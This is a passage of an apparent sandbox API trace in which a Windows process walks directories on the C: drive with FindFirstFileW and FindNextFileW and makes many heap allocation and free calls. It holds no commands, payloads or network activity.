lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x505097c4, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x505097c4, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x111000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="System.evtx", cAlternateFileName="SYSTEM~1.EVT")) returned 1 [0286.536] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50555c8d, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50555c8d, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Windows PowerShell.evtx", cAlternateFileName="WINDOW~1.EVT")) returned 1 [0286.536] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50555c8d, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50555c8d, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Windows PowerShell.evtx", cAlternateFileName="WINDOW~1.EVT")) returned 0 [0286.536] FindClose (in: hFindFile=0x3947be8 | out: hFindFile=0x3947be8) returned 1 [0286.539] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3ff0728 | out: hHeap=0x470000) returned 1 [0286.539] FindNextFileW (in: hFindFile=0x48a170, lpFindFileData=0x385fcf8 | out: lpFindFileData=0x385fcf8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6e97b025, ftCreationTime.dwHighDateTime=0x1d3275c, ftLastAccessTime.dwLowDateTime=0x6e97b025, ftLastAccessTime.dwHighDateTime=0x1d3275c, ftLastWriteTime.dwLowDateTime=0xd2b66788, ftLastWriteTime.dwHighDateTime=0x1d60985, nFileSizeHigh=0x0, nFileSizeLow=0x28000000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0286.540] FindNextFileW (in: hFindFile=0x48a170, lpFindFileData=0x385fcf8 | out: lpFindFileData=0x385fcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa03748ae, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17b3dd09, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0286.540] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x3ff0728 [0286.540] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\*", lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50555c8d, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50555c8d, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Windows PowerShell.evtx", cAlternateFileName="ꤨL\x08")) returned 0xffffffff [0286.557] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3ff0728 | out: hHeap=0x470000) returned 1 [0286.557] FindNextFileW (in: hFindFile=0x48a170, lpFindFileData=0x385fcf8 | out: lpFindFileData=0x385fcf8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x5d2666f8, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5d2666f8, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0286.557] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x3ff0728 [0286.557] FindFirstFileW (in: lpFileName="C:\\Program Files\\*", lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x5d2666f8, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5d2666f8, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName=".", cAlternateFileName="")) returned 0x3947e28 [0286.557] FindNextFileW (in: hFindFile=0x3947e28, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x5d2666f8, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5d2666f8, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="..", cAlternateFileName="")) returned 1 [0286.557] FindNextFileW (in: hFindFile=0x3947e28, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xeba10cbe, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xeba10cbe, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Common Files", cAlternateFileName="COMMON~1")) returned 1 [0286.557] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4057ed0 [0286.558] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xeba10cbe, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xeba10cbe, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3947ea8 [0286.558] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xeba10cbe, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xeba10cbe, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0286.558] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0x4aab75fe, ftCreationTime.dwHighDateTime=0x1d327e9, ftLastAccessTime.dwLowDateTime=0xa0417b85, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x4aadd873, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DESIGNER", cAlternateFileName="")) returned 1 [0286.558] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4067ed8 [0286.559] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\*", lpFindFileData=0x385f584 | out: lpFindFileData=0x385f584*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0x4aab75fe, ftCreationTime.dwHighDateTime=0x1d327e9, ftLastAccessTime.dwLowDateTime=0xa0417b85, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x4aadd873, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x3947fe8 [0286.559] FindNextFileW (in: hFindFile=0x3947fe8, lpFindFileData=0x385f584 | out: lpFindFileData=0x385f584*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0x4aab75fe, ftCreationTime.dwHighDateTime=0x1d327e9, ftLastAccessTime.dwLowDateTime=0xa0417b85, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x4aadd873, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0286.559] FindNextFileW (in: hFindFile=0x3947fe8, lpFindFileData=0x385f584 | out: lpFindFileData=0x385f584*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c8c3a00, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0x4aadd873, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x5c8c3a00, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x3e70, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="MSADDNDR.OLB", cAlternateFileName="")) returned 1 [0286.559] FindNextFileW (in: hFindFile=0x3947fe8, lpFindFileData=0x385f584 | out: lpFindFileData=0x385f584*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c8c3a00, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0x4aadd873, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x5c8c3a00, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x3e70, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="MSADDNDR.OLB", cAlternateFileName="")) returned 0 [0286.559] FindClose (in: hFindFile=0x3947fe8 | out: hFindFile=0x3947fe8) returned 1 [0286.560] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4067ed8 | out: hHeap=0x470000) returned 1 [0286.560] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa04663f2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x4accd6e1, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="microsoft shared", cAlternateFileName="MICROS~1")) returned 1 [0286.560] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4067ed8 [0286.560] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\*", lpFindFileData=0x385f584 | out: lpFindFileData=0x385f584*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa04663f2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x4accd6e1, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x3948268 [0286.560] FindNextFileW (in: hFindFile=0x3948268, lpFindFileData=0x385f584 | out: lpFindFileData=0x385f584*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa04663f2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x4accd6e1, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0286.560] FindNextFileW (in: hFindFile=0x3948268, lpFindFileData=0x385f584 | out: lpFindFileData=0x385f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf6c42af, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x81028f76, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x81028f76, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ClickToRun", cAlternateFileName="CLICKT~1")) returned 1 [0286.560] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4077ee0 [0286.561] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\*", lpFindFileData=0x385f308 | out: lpFindFileData=0x385f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf6c42af, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x81028f76, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x81028f76, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3947ca8 [0286.561] FindNextFileW (in: hFindFile=0x3947ca8, lpFindFileData=0x385f308 | out: lpFindFileData=0x385f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf6c42af, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x81028f76, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x81028f76, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0286.562] FindNextFileW (in: hFindFile=0x3947ca8, lpFindFileData=0x385f308 | out: lpFindFileData=0x385f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x809e6bf5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x809e6bf5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x48c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-file-l1-2-0.dll", cAlternateFileName="API-MS~1.DLL")) returned 1 [0286.562] FindNextFileW (in: hFindFile=0x3947ca8, lpFindFileData=0x385f308 | out: lpFindFileData=0x385f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x809e6bf5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x809e6bf5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x48c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-file-l2-1-0.dll", cAlternateFileName="API-MS~2.DLL")) returned 1 [0286.562] FindNextFileW (in: hFindFile=0x3947ca8, lpFindFileData=0x385f308 | out: lpFindFileData=0x385f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x52c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-localization-l1-2-0.dll", cAlternateFileName="API-MS~3.DLL")) returned 1 [0286.562] FindNextFileW (in: hFindFile=0x3947ca8, lpFindFileData=0x385f308 | out: lpFindFileData=0x385f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x4ac0, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-processthreads-l1-1-1.dll", cAlternateFileName="API-MS~4.DLL")) returned 1 [0286.563] FindNextFileW (in: hFindFile=0x3947ca8, lpFindFileData=0x385f308 | out: lpFindFileData=0x385f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x4ac0, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-synch-l1-2-0.dll", cAlternateFileName="APF10C~1.DLL")) returned 1 [0286.563] FindNextFileW (in: hFindFile=0x3947ca8, lpFindFileData=0x385f308 | out: lpFindFileData=0x385f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x48c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-timezone-l1-1-0.dll", cAlternateFileName="AP7902~1.DLL")) returned 1 [0286.566] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4014d58, Size=0x8000) returned 0x4014d58 [0286.569] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0286.569] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4077ee0 [0286.620] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0286.732] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0286.733] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0286.733] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0286.738] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0286.739] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0286.739] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0286.743] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0286.744] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0286.745] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0286.745] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0286.745] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0286.746] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0286.746] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0286.777] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0286.785] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0286.786] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0286.789] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0286.790] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0286.808] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0286.811] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0286.811] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0286.811] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0286.826] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0286.827] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0286.827] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0286.827] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0286.828] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0287.496] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4047ec8 | out: hHeap=0x470000) returned 1 [0287.499] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4047ec8 | out: hHeap=0x470000) returned 1 [0287.499] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4047ec8 | out: hHeap=0x470000) returned 1 [0287.499] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4047ec8 | out: hHeap=0x470000) returned 1 [0287.500] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4047ec8 | out: hHeap=0x470000) returned 1 [0287.501] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4047ec8 | out: hHeap=0x470000) returned 1 [0287.501] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4047ec8 | out: hHeap=0x470000) returned 1 [0287.502] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4047ec8 | out: hHeap=0x470000) returned 1 [0287.503] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4047ec8 | out: hHeap=0x470000) returned 1 [0287.503] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4047ec8 | out: hHeap=0x470000) returned 1 [0287.503] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4047ec8 | out: hHeap=0x470000) returned 1 [0287.503] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4047ec8 | out: hHeap=0x470000) returned 1 [0287.504] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4047ec8 | out: hHeap=0x470000) returned 1 [0287.504] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4047ec8 | out: hHeap=0x470000) returned 1 [0287.505] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4047ec8 | out: hHeap=0x470000) returned 1 [0287.505] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4047ec8 | out: hHeap=0x470000) returned 1 [0287.506] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4047ec8 | out: hHeap=0x470000) returned 1 [0287.506] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4047ec8 | out: hHeap=0x470000) returned 1 [0287.507] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4047ec8 | out: hHeap=0x470000) returned 1 [0287.507] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4047ec8 | out: hHeap=0x470000) returned 1 [0287.508] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4047ec8 | out: hHeap=0x470000) returned 1 [0287.508] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4047ec8 | out: hHeap=0x470000) returned 1 [0287.508] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4047ec8 | out: hHeap=0x470000) returned 1 [0287.508] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0287.510] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0287.510] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4047ec8 | out: hHeap=0x470000) returned 1 [0287.550] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0287.552] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4047ec8 | out: hHeap=0x470000) returned 1 [0287.553] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4047ec8 | out: hHeap=0x470000) returned 1 [0287.554] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4047ec8 | out: hHeap=0x470000) returned 1 [0287.557] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4047ec8 | out: hHeap=0x470000) returned 1 [0287.558] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0287.558] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4047ec8 | out: hHeap=0x470000) returned 1 [0287.559] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0287.559] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4047ec8 | out: hHeap=0x470000) returned 1 [0287.560] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4047ec8 | out: hHeap=0x470000) returned 1 [0287.561] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4047ec8 | out: hHeap=0x470000) returned 1 [0287.755] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0287.755] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0287.755] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4047ec8 | out: hHeap=0x470000) returned 1 [0287.757] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4067ed8 | out: hHeap=0x470000) returned 1 [0287.761] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4047ec8 | out: hHeap=0x470000) returned 1 [0287.843] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4014d58, Size=0x10000) returned 0x4077ee0 [0287.844] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4067ed8 | out: hHeap=0x470000) returned 1 [0287.846] HeapFree (in: hHeap=0x470000, 